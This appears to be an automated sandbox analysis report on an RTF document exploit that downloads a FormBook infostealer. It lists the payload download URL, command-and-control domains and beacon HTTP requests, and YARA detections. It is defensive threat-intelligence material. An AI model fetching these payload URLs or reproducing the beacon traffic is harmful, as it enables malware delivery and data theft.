          Source: EQNEDT32.EXE, 00000002.00000002.354164250.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exej
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6061k.vip
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6061k.vip/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6061k.vip/t2ti/www.xazeyu.net
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6061k.vipReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.albertcolet.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.albertcolet.com/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.albertcolet.com/t2ti/www.guimisha.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.albertcolet.comReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alishopogolic.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alishopogolic.com/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alishopogolic.com/t2ti/www.maquibotanic.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.alishopogolic.comReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allamericanshuttlellc.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allamericanshuttlellc.com/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allamericanshuttlellc.com/t2ti/www.shucaimh.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allamericanshuttlellc.comReferer:
          Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fxzx01.icu
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fxzx01.icu/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fxzx01.icu/t2ti/www.albertcolet.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fxzx01.icuReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.guimisha.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.guimisha.com/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.guimisha.com/t2ti/www.ssongg10292.cfd
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.guimisha.comReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hhmhhhbh.xyz
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hhmhhhbh.xyz/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hhmhhhbh.xyz/t2ti/www.techsterverse.life
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hhmhhhbh.xyzReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.janenas.top
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.janenas.top/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.janenas.top/t2ti/www.alishopogolic.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.janenas.topReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maquibotanic.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maquibotanic.com/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maquibotanic.comReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michealwilshire.online
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michealwilshire.online/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michealwilshire.online/t2ti/www.janenas.top
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michealwilshire.onlineReferer:
          Source: explorer.exe, 00000008.00000000.355385878.0000000005E08000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
          Source: explorer.exe, 00000008.00000000.356321404.0000000007968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.0000000007997000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.000000000795D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354623320.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.356321404.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880167411.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000002.880897164.00000000078DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://
          Source: explorer.exe, 00000008.00000000.356321404.0000000007968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.0000000007997000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.000000000795D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354623320.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.356321404.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880167411.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shucaimh.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shucaimh.com/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shucaimh.com/t2ti/www.6061k.vip
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shucaimh.comReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spacecargo.net
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spacecargo.net/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spacecargo.net/t2ti/www.michealwilshire.online
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spacecargo.netReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ssongg10292.cfd
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ssongg10292.cfd/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ssongg10292.cfd/t2ti/www.hhmhhhbh.xyz
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ssongg10292.cfdReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techsterverse.life
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techsterverse.life/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techsterverse.life/t2ti/www.www32561b.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techsterverse.lifeReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.www32561b.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.www32561b.com/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.www32561b.com/t2ti/www.spacecargo.net
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.www32561b.comReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xazeyu.net
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xazeyu.net/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xazeyu.net/t2ti/www.fxzx01.icu
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xazeyu.netReferer:
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: EQNEDT32.EXE, 00000002.00000002.354183793.00000000002E5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354079033.00000000002E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamini.in/
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.354183793.00000000002E5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.353995693.0000000000357000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354079033.00000000002E5000.00000004.00000020.00020000.00000000.sdmp, balokarat2.1[1].htm.2.drString found in binary or memory: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: EQNEDT32.EXE, 00000002.00000003.353995693.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeemC:
          Source: EQNEDT32.EXE, 00000002.00000002.354164250.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeqqC:
          Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: explorer.exe, 00000008.00000002.881102573.000000000891F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.879666706.000000000293F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{549C67C8-FC54-4D4D-BB29-D3A79D220C79}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: swamini.in
          Source: C:\Windows\explorer.exeCode function: 8_2_08CA6F82 getaddrinfo,setsockopt,recv,8_2_08CA6F82
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: swamini.in
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: swamini.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf HTTP/1.1Host: www.shucaimh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g== HTTP/1.1Host: www.6061k.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1Host: www.xazeyu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 21 Nov 2023 12:27:15 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "6552b2aa-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: unknownHTTPS traffic detected: 103.224.247.210:443 -> 192.168.2.22:49162 version: TLS 1.2
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00404FC2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.881171114.0000000008CBE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
